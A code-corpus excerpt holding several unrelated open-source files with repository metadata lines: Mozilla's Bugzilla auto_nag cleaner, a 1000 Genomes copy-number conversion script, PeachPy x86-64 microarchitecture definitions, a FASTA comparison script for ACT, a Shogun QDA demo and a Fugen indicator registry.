        self.commenthandler(bug, bugid, data)
    def get_comments(self, bugs):
        """Get the bugs comments"""
        # comments are only fetched when the report needs the last-comment
        # column; otherwise this is a no-op
        if self.has_last_comment_time():
            bugids = self.get_list_bugs(bugs)
            Bugzilla(
                bugids=bugids, commenthandler=self._commenthandler, commentdata=bugs
            ).get_data().wait()
        return bugs
    def has_last_comment_time(self):
        """Whether the report includes the time of the last comment."""
        return False
    def get_list_bugs(self, bugs):
        """Flatten the collected bug data into a list of bug ids."""
        return [x["id"] for x in bugs.values()]
    def get_documentation(self):
        """Markdown link to this tool's wiki documentation."""
        return "For more information, please visit [auto_nag documentation](https://wiki.mozilla.org/Release_Management/autonag#{}).".format(
            self.get_tool_path().replace("/", ".2F")
        )
def has_bot_set_ni(self, bug):
if not self.has_flags:
raise Exception
return utils.has_bot_set_ni(bug)
    def set_needinfo(self):
        """Render one needinfo comment + flag change per queued auto-ni.

        Returns {bugid: change-dict} suitable for Bugzilla.put.
        """
        if not self.auto_needinfo:
            return {}
        template_name = self.needinfo_template()
        assert bool(template_name)
        env = Environment(loader=FileSystemLoader("templates"))
        template = env.get_template(template_name)
        res = {}
        doc = self.get_documentation()
        for ni_mail, info in self.auto_needinfo.items():
            nick = info["nickname"]
            for bugid in info["bugids"]:
                comment = template.render(
                    nickname=nick,
                    extra=self.get_extra_for_needinfo_template(),
                    plural=utils.plural,
                    bugid=bugid,
                    documentation=doc,
                )
                comment = comment.strip() + "\n"
                data = {
                    "comment": {"body": comment},
                    "flags": [
                        {
                            "name": "needinfo",
                            "requestee": ni_mail,
                            "status": "?",
                            "new": "true",
                        }
                    ],
                }
                res[bugid] = data
        return res
    def has_individual_autofix(self, changes):
        # check if we have a dictionary with bug numbers as keys
        # return True if all the keys are bug number
        # (which means that each bug has its own autofix)
        return changes and all(
            isinstance(bugid, six.integer_types) or bugid.isdigit() for bugid in changes
        )
    def get_autofix_change(self):
        """Get the change to do to autofix the bugs"""
        return {}
    def autofix(self, bugs):
        """Autofix the bugs according to what is returned by get_autofix_change"""
        ni_changes = self.set_needinfo()
        change = self.get_autofix_change()
        if not ni_changes and not change:
            return bugs
        self.has_autofix = True
        new_changes = {}
        if not self.has_individual_autofix(change):
            # one global change, merged with any per-bug needinfo
            bugids = self.get_list_bugs(bugs)
            for bugid in bugids:
                new_changes[bugid] = utils.merge_bz_changes(
                    change, ni_changes.get(bugid, {})
                )
        else:
            # per-bug changes keyed by bug id (ints normalised to str)
            change = {str(k): v for k, v in change.items()}
            bugids = set(change.keys()) | set(ni_changes.keys())
            for bugid in bugids:
                mrg = utils.merge_bz_changes(
                    change.get(bugid, {}), ni_changes.get(bugid, {})
                )
                if mrg:
                    new_changes[bugid] = mrg
        if self.dryrun or self.test_mode:
            # dry-run: only log what would be pushed
            for bugid, ch in new_changes.items():
                logger.info(
                    "The bugs: {}\n will be autofixed with:\n{}".format(bugid, ch)
                )
        else:
            extra = self.get_db_extra()
            max_retries = utils.get_config("common", "bugzilla_max_retries", 3)
            for bugid, ch in new_changes.items():
                added = False
                # retry transient Bugzilla.put failures with a short pause
                for _ in range(max_retries):
                    failures = Bugzilla([str(bugid)]).put(ch)
                    if failures:
                        time.sleep(1)
                    else:
                        added = True
                        db.BugChange.add(self.name(), bugid, extra=extra.get(bugid, ""))
                        break
                if not added:
                    self.failure_callback(bugid)
                    logger.error(
                        "{}: Cannot put data for bug {} (change => {}).".format(
                            self.name(), bugid, ch
                        )
                    )
        return bugs
    def failure_callback(self, bugid):
        """Called on Bugzilla.put failures"""
        return
    def terminate(self):
        """Called when everything is done"""
        return
    def organize(self, bugs):
        """Arrange the collected bug data into report columns/rows."""
        return utils.organize(bugs, self.columns(), key=self.sort_columns())
    def add_to_cache(self, bugs):
        """Add the bug keys to cache"""
        if isinstance(bugs, dict):
            self.cache.add(bugs.keys())
        else:
            self.cache.add(bugs)
def get_email(self, date, bug_ids=[]):
"""Get title and body for the email"""
bugs = self.get_bugs(date=date, bug_ids=bug_ids)
bugs = self.autofix(bugs)
self.add_to_cache(bugs)
if bugs:
bugs = self.organize(bugs)
extra = self.get_extra_for_template()
env = Environment(loader=FileSystemLoader("templates"))
template = env.get_template(self.template())
message = template.render(
date=date,
data=bugs,
extra=extra,
str=str,
enumerate=enumerate,
plural=utils.plural,
no_manager=self.no_manager,
table_attrs=self.get_config("table_attrs"),
preamble=self.preamble(),
)
common = env.get_template("common.html")
body = common.render(message=message, query_url=self.query_url)
return self.get_email_subject(date), body
return None, None
    def send_email(self, date="today"):
        """Send the email"""
        if date:
            date = lmdutils.get_date(date)
            d = lmdutils.get_date_ymd(date)
            if isinstance(self, Nag):
                self.nag_date = d
            if not self.must_run(d):
                return
        if not self.has_enough_data():
            logger.info("The tool {} hasn't enough data to run".format(self.name()))
            return
        login_info = utils.get_login_info()
        title, body = self.get_email(date)
        if title:
            receivers = self.get_receivers()
            status = "Success"
            try:
                mail.send(
                    login_info["ldap_username"],
                    receivers,
                    title,
                    body,
                    html=True,
                    login=login_info,
                    dryrun=self.dryrun,
                )
            except Exception:
                # log and record the failure, but don't crash the tool
                logger.exception("Tool {}".format(self.name()))
                status = "Failure"
            db.Email.add(self.name(), receivers, "global", status)
            if isinstance(self, Nag):
                # nag tools additionally send per-manager emails
                self.send_mails(title, dryrun=self.dryrun)
        else:
            name = self.name().upper()
            if date:
                logger.info("{}: No data for {}".format(name, date))
            else:
                logger.info("{}: No data".format(name))
            logger.info("Query: {}".format(self.query_url))
def add_custom_arguments(self, parser):
pass
def parse_custom_arguments(self, args):
pass
def get_args_parser(self):
"""Get the argumends from the command line"""
parser = argparse.ArgumentParser(description=self.description())
parser.add_argument(
"-d",
"--dryrun",
dest="dryrun",
action="store_true",
help="Just do the query, and print emails to console without emailing anyone",
)
if not self.ignore_date():
parser.add_argument(
"-D",
"--date",
dest="date",
action="store",
default="today",
help="Date for the query",
)
self.add_custom_arguments(parser)
return parser
    def run(self):
        """Run the tool"""
        args = self.get_args_parser().parse_args()
        self.parse_custom_arguments(args)
        date = "" if self.ignore_date() else args.date
        self.dryrun = args.dryrun
        self.cache.set_dry_run(self.dryrun)
        try:
            self.send_email(date=date)
            self.terminate()
            logger.info("Tool {} has finished.".format(self.get_tool_path()))
        except Exception:
            # catch-all boundary: log the traceback, never propagate
            logger.exception("Tool {}".format(self.name()))
|
mozilla/bztools
|
auto_nag/bzcleaner.py
|
Python
|
bsd-3-clause
| 21,123
|
[
"VisIt"
] |
fbb4a4d0bf00a22ce72b3246113428fe500e1fe0f7cb6642d9b6b94f7cb80f52
|
import pandas as pd
import numpy as np
import toolshed as ts
# NOTE(review): this is a Python 2 script (see the print statements
# further down) using a legacy pandas API.
# Load the Conrad et al. genotype map and normalise it into BED-like
# columns: chromosome as string (23 -> X), integer start/end.
xl = pd.ExcelFile('data/nature08516-s4.xls')
gm = xl.parse("Genotype Map", index_col=0)
gm = gm[~np.isnan(gm.start)]
gm.chr = gm.chr.astype(int).astype(str)
# NOTE(review): chained assignment -- modern pandas would want .loc here
gm.chr[gm.chr == "23"] = "X"
gm.start = gm.start.astype(int)
gm.end = gm.end.astype(int)
gm.drop('source', axis=1, inplace=True)
gm.drop('cn', axis=1, inplace=True)
# rename the first column to '#chrom' for BED-style output
gm.columns = (['#chrom'] + list(gm.columns[1:]))
print(gm.head())
j = gm
def get_bam_lookup(p="data/bam-lookups-from-1kg-site.tsv"):
    # Map sample id -> exome-alignment BAM URL from the 1000 Genomes
    # index, skipping low-coverage, per-chromosome and unmapped files.
    l = {}
    for d in ts.reader(p):
        if 'low_coverage' in d['url']: continue
        if 'chr20' in d['url']: continue
        if 'chrom20' in d['url']: continue
        if 'chrom11' in d['url']: continue
        if 'unmapped' in d['url']: continue
        # NOTE: we could also get some samples with cram.
        if not d['url'].endswith('.bam'): continue
        # NOTE(review): when a sample appears twice, both URLs are
        # printed and the later one silently wins -- presumably debug
        # output; confirm this is intentional.
        if d['Sample'] in l:
            print "XXX:", d['url']
            print "YYY:", l[d['Sample']]
        l[d['Sample']] = d['url']
    return l
samples = get_bam_lookup()
# NOTE(review): `url` is assigned but never used below -- presumably
# superseded by get_bam_lookup(); confirm before removing.
url = "ftp://ftp.1000genomes.ebi.ac.uk/vol1/ftp/phase3/data/{sample}/exome_alignment/{sample}.mapped.ILLUMINA.bwa.{pop}.exome.20120522.bam"
bamfh = open('data/samples.bams.txt', 'w')
# join per-population copy-number sheets onto the map and record which
# samples have a known BAM URL
for p in ('CEU', 'CHB+JPT', 'YRI'):
    pop = xl.parse(p, index_col=0)
    j = j.join(pop, how="inner")
    for s in pop.columns[1:]:
        if s in samples:
            bamfh.write("%s\t%s\n" % (s, samples[s]))
bamfh.close()
# wide format: one column per sample
j.sort_values(by=['#chrom', 'start'], inplace=True)
j.to_csv('data/copy-numbers.hg18.wide.bed', index=False,
         float_format="%.0f", sep="\t", na_rep='nan')
# long format: one row per (region, sample), keeping only non-diploid CNs
jlong = pd.melt(j, id_vars=('#chrom', 'start', 'end'),
                value_vars=list(j.columns[4:]), var_name='sample', value_name='cn')
print jlong.shape
# NOTE(review): .ix was removed in modern pandas (use .loc/.iloc)
jlong = jlong.ix[jlong.cn != 2, :]
jlong.sort_values(by=['#chrom', 'start'], inplace=True)
print jlong.shape
print jlong.head()
jlong.to_csv('data/copy-numbers.hg18.long.bed', index=False,
             float_format="%.0f", sep="\t", na_rep='nan')
# samples format: one row per (region, cn) with comma-joined sample ids
grouped = jlong.groupby(['#chrom','start', 'end', 'cn'], axis=0,
                        as_index=False)
short = grouped.agg(lambda col: ",".join(col))
print short.__class__
short.sort_values(by=['#chrom', 'start', 'cn'], inplace=True)
short.to_csv('data/copy-numbers.hg18.samples.bed', index=False,
             float_format="%.0f", sep="\t", na_rep='nan')
|
brentp/bio-playground
|
1kg-cnv/scripts/truth-xls-to-tsv.py
|
Python
|
mit
| 2,379
|
[
"BWA"
] |
f416a71ce800eeeeaee08af33a3221eaee51dfdb43be3f416920651958028f96
|
# This file is part of Peach-Py package and is licensed under the Simplified BSD license.
# See license.rst for the full text of the license.
from peachpy.x86_64 import isa
class Microarchitecture:
    """An x86-64 microarchitecture: a name, the closure of its supported
    ISA extensions, and its datapath widths (ALU/FPU/load/store)."""
    def __init__(self, name, extensions, alu_width, fpu_width, load_with, store_width):
        # NOTE(review): the parameter is spelled `load_with` (sic).  All
        # call sites below pass it by keyword, so renaming it would be a
        # breaking change; it is stored under the intended name
        # `load_width`.
        self.name = name
        # expand each listed extension into its full prerequisite set
        self.extensions = isa.Extensions(*[prerequisite for extension in extensions
                                           for prerequisite in extension.prerequisites])
        self.alu_width = alu_width
        self.fpu_width = fpu_width
        self.load_width = load_with
        self.store_width = store_width
    def is_supported(self, extension):
        """True if *extension* is among this microarchitecture's extensions."""
        return extension in self.extensions
    @property
    def id(self):
        """Identifier form of the name (spaces stripped)."""
        return self.name.replace(" ", "")
    @property
    def has_sse3(self):
        return isa.sse3 in self.extensions
    @property
    def has_ssse3(self):
        return isa.ssse3 in self.extensions
    @property
    def has_sse4_1(self):
        return isa.sse4_1 in self.extensions
    @property
    def has_sse4_2(self):
        return isa.sse4_2 in self.extensions
    @property
    def has_avx(self):
        return isa.avx in self.extensions
    @property
    def has_avx2(self):
        return isa.avx2 in self.extensions
    @property
    def has_fma3(self):
        return isa.fma3 in self.extensions
    @property
    def has_fma4(self):
        return isa.fma4 in self.extensions
    @property
    def has_fma(self):
        """True if either FMA3 or FMA4 is available."""
        return self.has_fma3 or self.has_fma4
    @property
    def has_avx512f(self):
        return isa.avx512f in self.extensions
    def __add__(self, extension):
        """New Microarchitecture with *extension* added (widths kept)."""
        return Microarchitecture(self.name, self.extensions + extension,
                                 self.alu_width, self.fpu_width, self.load_width, self.store_width)
    def __sub__(self, extension):
        """New Microarchitecture with *extension* removed (widths kept)."""
        return Microarchitecture(self.name, self.extensions - extension,
                                 self.alu_width, self.fpu_width, self.load_width, self.store_width)
    # equality and hashing are by name only
    def __hash__(self):
        return hash(self.name)
    def __eq__(self, other):
        return isinstance(other, Microarchitecture) and self.name == other.name
    def __ne__(self, other):
        return not isinstance(other, Microarchitecture) or self.name != other.name
    def __str__(self):
        return self.name
    def __repr__(self):
        return str(self)
# Predefined microarchitecture descriptions.  Widths are data-path widths in
# bits; the keyword is spelled "load_with" to match the constructor parameter.
# Generic baseline target.
default = Microarchitecture('Default', isa.default,
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
# Intel NetBurst.
prescott = Microarchitecture('Prescott', (isa.cmov, isa.sse3),
    alu_width=64, fpu_width=64, load_with=64, store_width=64)
# Intel Core big cores.
conroe = Microarchitecture('Conroe', (isa.cmov, isa.mmx_plus, isa.ssse3),
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
penryn = Microarchitecture('Penryn', (isa.cmov, isa.mmx_plus, isa.sse4_1),
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
nehalem = Microarchitecture('Nehalem', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt),
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
sandy_bridge = Microarchitecture('Sandy Bridge', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.avx),
    alu_width=128, fpu_width=256, load_with=256, store_width=128)
ivy_bridge = Microarchitecture('Ivy Bridge', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.avx, isa.f16c),
    alu_width=128, fpu_width=256, load_with=256, store_width=128)
haswell = Microarchitecture('Haswell', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.avx, isa.f16c, isa.fma3,
    isa.avx2, isa.lzcnt, isa.three_d_now_prefetch, isa.movbe, isa.bmi2),
    alu_width=256, fpu_width=256, load_with=256, store_width=256)
broadwell = Microarchitecture('Broadwell', (isa.cmov, isa.mmx_plus, isa.sse4_2, isa.popcnt, isa.f16c, isa.fma3, isa.avx2,
    isa.lzcnt, isa.three_d_now_prefetch, isa.movbe, isa.bmi2, isa.adx),
    alu_width=256, fpu_width=256, load_with=256, store_width=256)
# AMD big cores.
k8 = Microarchitecture('K8', (isa.cmov, isa.mmx_plus, isa.three_d_now_plus, isa.three_d_now_prefetch, isa.sse2),
    alu_width=64, fpu_width=64, load_with=64, store_width=64)
k10 = Microarchitecture('K10', (isa.cmov, isa.mmx_plus, isa.three_d_now_plus, isa.three_d_now_prefetch, isa.sse4a,
    isa.popcnt, isa.lzcnt),
    alu_width=128, fpu_width=128, load_with=128, store_width=64)
bulldozer = Microarchitecture('Bulldozer', (isa.cmov, isa.mmx_plus, isa.sse4a, isa.avx, isa.xop, isa.fma4,
    isa.three_d_now_prefetch, isa.aes, isa.pclmulqdq, isa.lzcnt, isa.popcnt),
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
piledriver = Microarchitecture('Piledriver', (isa.cmov, isa.mmx_plus, isa.sse4a, isa.sse4_2, isa.avx, isa.xop, isa.fma4,
    isa.fma3, isa.f16c, isa.three_d_now_prefetch, isa.aes, isa.pclmulqdq,
    isa.lzcnt, isa.popcnt, isa.bmi, isa.tbm),
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
steamroller = Microarchitecture('Steamroller', (isa.cmov, isa.mmx_plus, isa.sse4a, isa.avx, isa.xop, isa.fma4, isa.fma3,
    isa.f16c, isa.three_d_now_prefetch, isa.aes, isa.pclmulqdq, isa.lzcnt,
    isa.popcnt, isa.bmi, isa.tbm),
    alu_width=128, fpu_width=256, load_with=256, store_width=128)
# Intel Atom line.
bonnell = Microarchitecture('Bonnell', (isa.cmov, isa.movbe, isa.mmx_plus, isa.ssse3),
    alu_width=128, fpu_width=64, load_with=128, store_width=128)
saltwell = Microarchitecture('Saltwell', (isa.cmov, isa.movbe, isa.mmx_plus, isa.ssse3),
    alu_width=128, fpu_width=64, load_with=128, store_width=128)
silvermont = Microarchitecture('Silvermont', (isa.cmov, isa.movbe, isa.popcnt, isa.mmx_plus, isa.sse4_2, isa.aes,
    isa.pclmulqdq),
    alu_width=128, fpu_width=64, load_with=128, store_width=128)
# AMD low-power "cat" cores.
bobcat = Microarchitecture('Bobcat', (isa.cmov, isa.mmx_plus, isa.three_d_now_prefetch, isa.ssse3, isa.sse4a),
    alu_width=64, fpu_width=64, load_with=64, store_width=64)
jaguar = Microarchitecture('Jaguar', (isa.cmov, isa.movbe, isa.lzcnt, isa.bmi, isa.popcnt, isa.three_d_now_prefetch,
    isa.mmx_plus, isa.sse4_2, isa.sse4a, isa.avx, isa.f16c, isa.aes, isa.pclmulqdq),
    alu_width=128, fpu_width=128, load_with=128, store_width=128)
|
pombredanne/PeachPy
|
peachpy/x86_64/uarch.py
|
Python
|
bsd-2-clause
| 7,017
|
[
"Jaguar"
] |
5446fe4afa8526827c08d9002ce83a2d01df3fa1121cd669eb9cad2c0281b6d0
|
#!/usr/bin/env python3
import sys
import argparse
import pyfastaq
import pymummer
import subprocess
import os
# Command-line interface: alignment tool, output directory, then two or more
# FASTA files (order on the command line = top-to-bottom order in ACT).
parser = argparse.ArgumentParser(
    description='''Compares FASTA files with blast or nucmer, writes input files for ACT.
Then start ACT. Files from top to bottom in ACT are same as order
listed on command line when this script is run.''',
    usage='%(prog)s [options] <blast|nucmer|promer> <outdir> <file1.fa> <file2.fa> [<file3.fa ...]')
parser.add_argument('--blast_ops', help='blastall options [%(default)s]', default='-p blastn -m 8 -F F -e 0.01 -b 10000 -v 10000')
parser.add_argument('--nucmer_ops', help='nucmer or promer options [promer:--maxmatch. nucmer: --maxmatch --nosimplify]')
parser.add_argument('--no_delta_filter', action='store_true')
parser.add_argument('--no_act', action='store_true', help='Do not start act, just make comparison files etc')
parser.add_argument('--delta_ops', help='delta-filter options [%(default)s]', default='-m')
parser.add_argument('aln_tool', help='blast, nucmer or promer')
parser.add_argument('outdir', help='Output directory (must not already exist)')
parser.add_argument('fa_list', help='List of fasta files', nargs=argparse.REMAINDER)
options = parser.parse_args()
# At least two FASTA files are needed for a pairwise comparison.  Use
# parser.error() instead of `assert`: asserts are stripped under `python -O`
# and an AssertionError gives the user no usage message.
if len(options.fa_list) < 2:
    parser.error('at least two fasta files are required')
def index_to_union(ops, i):
    """Return the path of the temporary 'union' FASTA file for input index i."""
    filename = 'infile.' + str(i) + '.union.fa'
    return os.path.join(ops.outdir, filename)
def compare_with_blast(qry, ref, ops, outfile):
    """Compare qry against ref with legacy NCBI BLAST, writing hits to outfile.

    Runs formatdb on the reference first, then blastall with ops.blast_ops.
    """
    log_file = os.path.join(ops.outdir, '.formatdb.log')
    subprocess.check_output('formatdb -l ' + log_file + ' -p F -i ' + ref, shell=True)
    blast_cmd = ' '.join(['blastall', ops.blast_ops, '-d', ref, '-i', qry, '-o', outfile])
    subprocess.check_output(blast_cmd, shell=True)
def compare_with_nucmer(qry, ref, ops, outfile):
    """Compare qry against ref with nucmer/promer and write an ACT-readable
    crunch file to outfile.

    Pipeline: nucmer/promer -> (optional) delta-filter -> show-coords ->
    samtools faidx on both inputs -> pymummer conversion to MSPcrunch format.
    Side effect: fills in ops.nucmer_ops with a tool-specific default if unset
    (persists on the shared options object).
    """
    # Intermediate file names are derived by suffixing the output name.
    nucmer_out = outfile + '.nucmer.out'
    delta_file = nucmer_out + '.delta'
    filtered_file = delta_file + '.filter'
    coords_file = filtered_file + '.coords'
    if ops.nucmer_ops is None:
        if ops.aln_tool == 'promer':
            ops.nucmer_ops = '--maxmatch'
        else:
            ops.nucmer_ops = '--maxmatch --nosimplify'
    cmd = ' '.join([
        ops.aln_tool,
        ops.nucmer_ops,
        '-p', nucmer_out,
        ref,
        qry,
    ])
    print('cmd:', cmd)
    pyfastaq.utils.syscall(cmd)
    if ops.no_delta_filter:
        # Skip filtering: just copy the raw delta file into place.
        cmd = 'cp ' + delta_file + ' ' + filtered_file
    else:
        cmd = ' '.join([
            'delta-filter',
            ops.delta_ops,
            delta_file,
            '>', filtered_file,
        ])
    print('cmd:', cmd)
    pyfastaq.utils.syscall(cmd)
    cmd = ' '.join([
        'show-coords -dTlroH',
        filtered_file,
        '>', coords_file
    ])
    print('cmd:', cmd)
    pyfastaq.utils.syscall(cmd)
    # .fai indexes give the sequence lengths needed by the converter below.
    pyfastaq.utils.syscall('samtools faidx ' + qry)
    pyfastaq.utils.syscall('samtools faidx ' + ref)
    pymummer.coords_file.convert_to_msp_crunch(coords_file, outfile, qry + '.fai', ref + '.fai')
# check files exist, then normalize to absolute paths (the script chdirs later)
for i in range(len(options.fa_list)):
    if not os.path.exists(options.fa_list[i]):
        print('File not found:', options.fa_list[i], file=sys.stderr)
        sys.exit(1)
    options.fa_list[i] = os.path.abspath(options.fa_list[i])
try:
    os.mkdir(options.outdir)
except OSError:
    # Narrowed from a bare `except:`, which would also swallow
    # KeyboardInterrupt/SystemExit.
    print('Error making output directory', options.outdir)
    sys.exit(1)
# make union files: each input FASTA is collapsed into a single 'union'
# sequence, since ACT displays one sequence per track.
for i in range(len(options.fa_list)):
    seq = pyfastaq.sequences.Fasta('union', '')
    reader = pyfastaq.sequences.file_reader(options.fa_list[i])
    new_seq = []
    for s in reader:
        new_seq.append(s.seq)
    f = pyfastaq.utils.open_file_write(index_to_union(options, i))
    seq.seq = ''.join(new_seq)
    print(seq, file=f)
    pyfastaq.utils.close(f)
act_command = 'act ' + options.fa_list[0]
# run alignments between each consecutive pair of inputs
for i in range(len(options.fa_list)-1):
    qry = index_to_union(options, i+1)
    ref = index_to_union(options, i)
    outfile = 'compare.' + str(i) + '.vs.' + str(i+1)
    outfile_abs = os.path.join(options.outdir, outfile)
    if options.aln_tool == 'blast':
        compare_with_blast(qry, ref, options, outfile_abs)
    elif options.aln_tool in ['nucmer', 'promer']:
        compare_with_nucmer(qry, ref, options, outfile_abs)
    else:
        sys.exit('Unknown alignment tool:' + options.aln_tool)
    act_command += ' ' + outfile + ' ' + options.fa_list[i+1]
# delete temporary union files
for i in range(len(options.fa_list)):
    filename = index_to_union(options, i)
    os.unlink(filename)
    try:
        os.unlink(filename + '.fai')
    except OSError:
        # The .fai index only exists for the nucmer/promer path; best-effort
        # cleanup (narrowed from a bare `except:`).
        pass
# write ACT startup script into the output directory
try:
    os.chdir(options.outdir)
except OSError:
    # Narrowed from a bare `except:`.
    print('Error chdir', options.outdir)
    sys.exit(1)
act_script = 'start_act.sh'
with open(act_script, 'w') as f:
    print('#!/usr/bin/env bash', file=f)
    print('set -e', file=f)
    print('dir=$(dirname $0)', file=f)
    print('cd $dir', file=f)
    print(act_command, file=f)
os.chmod(act_script, 0o755)
if not options.no_act:
    subprocess.check_output('./' + act_script, shell=True)
|
martinghunt/bioinf-scripts
|
python/multi_act.py
|
Python
|
mit
| 5,051
|
[
"BLAST"
] |
b0a67efe48ca5da2aa16db932adeb2b1104d132a7a43a3a376fe5e420fdcfa4c
|
"""
Shogun demo
Fernando J. Iglesias Garcia
"""
import numpy as np
import matplotlib as mpl
import pylab
import util
from scipy import linalg
from shogun.Classifier import QDA
from shogun.Features import RealFeatures, MulticlassLabels
# colormap
# colormap
# Piecewise-linear colormap for the decision-region background: every channel
# ramps from 1.0 at the low end to 0.7 at the high end (white -> light grey).
cmap = mpl.colors.LinearSegmentedColormap('color_classes',
    {'red': [(0, 1, 1),
             (1, .7, .7)],
     'green': [(0, 1, 1),
               (1, .7, .7)],
     'blue': [(0, 1, 1),
              (1, .7, .7)]})
# Register under the name given above so pcolormesh can pick it up by default.
pylab.cm.register_cmap(cmap = cmap)
# Generate data from Gaussian distributions
# Generate data from Gaussian distributions
def gen_data():
    """Draw N two-dimensional points from each of three Gaussian classes.

    Returns (X, Y): X is a (3*N, dim) sample matrix and Y the class labels
    0, 1, 2 (N of each).  Uses the module-level N and dim; seeds NumPy's RNG
    for reproducibility.
    """
    np.random.seed(0)
    transforms = np.array([[[0., -1. ], [2.5, .7]],
                           [[3., -1.5], [1.2, .3]],
                           [[ 2, 0 ], [ .0, 1.5 ]]])
    offsets = (np.array([-4, 3]), np.array([-1, -5]), np.array([3, 4]))
    # Draw each class in turn (same RNG call order as a single expression).
    samples = [np.dot(np.random.randn(N, dim), transforms[k]) + offsets[k]
               for k in range(3)]
    X = np.vstack(samples)
    Y = np.concatenate((np.zeros(N), np.ones(N), 2 * np.ones(N)))
    return X, Y
def plot_data(qda, X, y, y_pred, ax):
    """Scatter-plot the three classes.

    Correctly classified points are drawn as circles ('o'), misclassified
    points as squares ('s'), and each class mean as a black dot.  The three
    previously copy-pasted per-class sections are collapsed into one loop.

    :param qda: trained QDA classifier (provides get_mean(k)).
    :param X: (n_samples, 2) data matrix.
    :param y: true labels (0, 1, 2).
    :param y_pred: predicted labels, same length as y.
    :param ax: unused; kept for interface compatibility.
    """
    correct = (y == y_pred)
    for k in range(3):
        Xk = X[y == k]
        ok = correct[y == k]
        # Correctly classified
        pylab.plot(Xk[ok, 0], Xk[ok, 1], 'o', color = cols[k])
        # Misclassified
        pylab.plot(Xk[~ok, 0], Xk[~ok, 1], 's', color = cols[k])
        # Class mean
        mk = qda.get_mean(k)
        pylab.plot(mk[0], mk[1], 'o', color = 'black', markersize = 8)
def plot_cov(plot, mean, cov, color):
    """Draw a translucent ellipse spanning two standard deviations of a 2-D
    Gaussian with the given mean and covariance on the given axes."""
    eigvals, eigvecs = linalg.eigh(cov)
    principal = eigvecs[0] / linalg.norm(eigvecs[0])
    angle = np.arctan(principal[1] / principal[0])  # rad
    angle = 180 * angle / np.pi                     # degrees
    # Axis lengths are 2*sqrt(eigenvalue) (two standard deviations).
    width = 2 * eigvals[0] ** 0.5
    height = 2 * eigvals[1] ** 0.5
    ell = mpl.patches.Ellipse(mean, width, height, 180 + angle, color = color)
    ell.set_clip_box(plot.bbox)
    ell.set_alpha(0.5)
    plot.add_artist(ell)
def plot_regions(qda):
    """Shade the current plot area by predicted class and outline the
    decision boundaries with black contours."""
    grid_w, grid_h = 500, 500
    x_lo, x_hi = pylab.xlim()
    y_lo, y_hi = pylab.ylim()
    xx, yy = np.meshgrid(np.linspace(x_lo, x_hi, grid_w),
                         np.linspace(y_lo, y_hi, grid_h))
    # Classify every grid point, then fold predictions back to grid shape.
    grid_points = RealFeatures(np.array((np.ravel(xx), np.ravel(yy))))
    predictions = qda.apply(grid_points).get_labels()
    Z = predictions.reshape(xx.shape)
    pylab.pcolormesh(xx, yy, Z)
    pylab.contour(xx, yy, Z, linewidths = 3, colors = 'k')
# Number of classes
M = 3
# Number of samples of each class
N = 300
# Dimension of the data
dim = 2
# Per-class plot colours (index = class label); also read by plot_data().
cols = ['blue', 'green', 'red']
fig = pylab.figure()
ax = fig.add_subplot(111)
pylab.title('Quadratic Discrimant Analysis')
# Build the training set and train a shogun QDA classifier on it.
X, y = gen_data()
labels = MulticlassLabels(y)
features = RealFeatures(X.T)
# NOTE(review): 1e-4 and True are presumably the covariance regularization
# and a store-covariances flag — confirm against the shogun QDA docs.
qda = QDA(features, labels, 1e-4, True)
qda.train()
ypred = qda.apply().get_labels()
plot_data(qda, X, y, ypred, ax)
# Overlay each class's two-standard-deviation covariance ellipse.
for i in range(M):
    plot_cov(ax, qda.get_mean(i), qda.get_cov(i), cols[i])
plot_regions(qda)
# util.quit is a project helper wired to key presses (presumably closes the
# window).
pylab.connect('key_press_event', util.quit)
pylab.show()
|
ratschlab/ASP
|
examples/undocumented/python_modular/graphical/multiclass_qda.py
|
Python
|
gpl-2.0
| 3,312
|
[
"Gaussian"
] |
3ecac96f76430dcef869125a8258a925fafc1e15a170825e178f2b0e165a7ef3
|
# coding: utf-8
# Copyright 2017 Solthis.
#
# This file is part of Fugen 2.0.
#
# Fugen 2.0 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Fugen 2.0 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fugen 2.0. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
from data.fuchia_database import FuchiaDatabase
import constants
# Global registry mapping indicator key -> {'class': indicator class};
# populated automatically by IndicatorMeta as each concrete subclass is defined.
INDICATORS_REGISTRY = {}
class IndicatorMeta(type):
    """Metaclass for indicators.

    Responsibilities:
    - register every concrete indicator class (one that implements
      get_key()) in INDICATORS_REGISTRY at class-creation time;
    - memoize one indicator instance per class for the current
      FuchiaDatabase, invalidating the cache when a different database
      is supplied.
    """
    # Database the cached INSTANCES were built from.
    FUCHIA_DB_INSTANCE = None
    # Cache: indicator class -> instance built from FUCHIA_DB_INSTANCE.
    INSTANCES = {}
    def __call__(cls, *args, **kwargs):
        # Only the single-FuchiaDatabase-argument construction is cached.
        if len(args) == 1 and isinstance(args[0], FuchiaDatabase):
            db = args[0]
            if db != cls.FUCHIA_DB_INSTANCE:
                # Invalidate cache
                # NOTE(review): assigning through `cls` stores these on the
                # individual indicator class (not on the metaclass), so the
                # cache/database tracking is per indicator class.
                cls.INSTANCES = {}
                cls.FUCHIA_DB_INSTANCE = db
            if cls not in cls.INSTANCES:
                cls.INSTANCES[cls] = super(
                    IndicatorMeta,
                    cls
                ).__call__(*args, **kwargs)
            return cls.INSTANCES[cls]
        # Any other argument pattern bypasses the cache entirely.
        return super(IndicatorMeta, cls).__call__(*args, **kwargs)
    def __init__(cls, *args, **kwargs):
        try:
            INDICATORS_REGISTRY[cls.get_key()] = {
                'class': cls,
            }
        except NotImplementedError:
            # Abstract classes leave get_key() unimplemented and are simply
            # not registered.
            pass
        return super(IndicatorMeta, cls).__init__(cls)
class BaseIndicator(metaclass=IndicatorMeta):
    """
    Abstract base class for an indicator.
    """
